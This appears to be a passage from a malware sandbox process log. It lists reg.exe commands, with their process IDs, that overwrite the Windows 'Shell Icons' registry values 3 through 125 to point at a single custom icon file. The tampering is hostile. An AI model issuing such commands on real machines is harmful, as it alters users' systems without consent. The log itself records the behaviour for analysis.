reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 3 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5892

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 4 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3228

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 5 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5388

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 6 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5292

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 7 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2136

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 8 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2988

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 9 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5564

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 10 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5568

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 11 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5796

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 12 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6044

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 13 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5180

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 14 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5228

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 15 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5280

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 16 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3772

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 17 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5064

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 18 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5384

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 19 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:4984

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 20 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5456

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 21 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5460

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 22 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:4924

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 23 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5448

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 24 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2988

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 25 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:4044

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 26 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2908

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 27 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5496

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 28 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5248

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 29 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5172

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 30 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:1848

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 31 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:4200

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 32 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2476

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 33 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5124

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 34 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:1416

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 35 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:1264

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 36 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:4636

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 37 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2720

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 38 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:4656

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 39 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5516

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 40 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5604

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 41 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5656

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 42 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:4548

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 43 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2060

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 44 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5816

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 45 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5772

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 46 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5824

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 47 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5724

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 48 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5716

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 49 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5720

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 50 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5548

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 51 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5592

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 52 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6004

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 53 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5528

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 54 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6048

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 55 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6024

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 56 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5784

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 57 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6088

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 58 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5748

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 59 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5848

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 60 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5868

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 61 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5232

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 62 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5132

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 63 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5316

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 64 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:712

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 65 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3228

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 66 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2044

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 67 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:308

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 68 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5480

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 69 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6076

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 70 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5488

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 71 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6128

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 72 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2116

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 73 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5404

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 74 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2136

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 75 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5448

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 76 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5396

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 77 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2404

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 78 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5388

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 79 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3140

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 80 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:4044

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 81 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:4616

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 82 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5520

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 83 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5348

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 84 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5484

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 85 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5248

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 86 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:1636

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 87 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:1432

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 88 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3756

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 89 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2388

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 90 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2412

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 91 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5504

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 92 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:244

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 93 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2476

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 94 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3536

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 95 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:4164

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 96 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5124

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 97 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:312

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 98 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:4728

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 99 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3324

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 100 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:1416

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 101 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:1264

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 102 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3116

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 103 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:424

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 104 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:4656

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 105 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:2236

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 106 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:3724

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 107 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5524

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 108 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5540

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 109 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5816

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 110 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5532

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 111 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5824

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 112 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5576

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 113 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5584

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 114 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5720

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 115 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6000

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 116 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6028

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 117 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5968

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 118 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5972

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 119 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5920

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 120 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6048

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 121 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6044

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 122 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:1916

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 123 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5784

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 124 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:5588

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 125 /t REG_EXPAND_SZ /d C:\java\icons\5.ico /f
12⤵
PID:6068

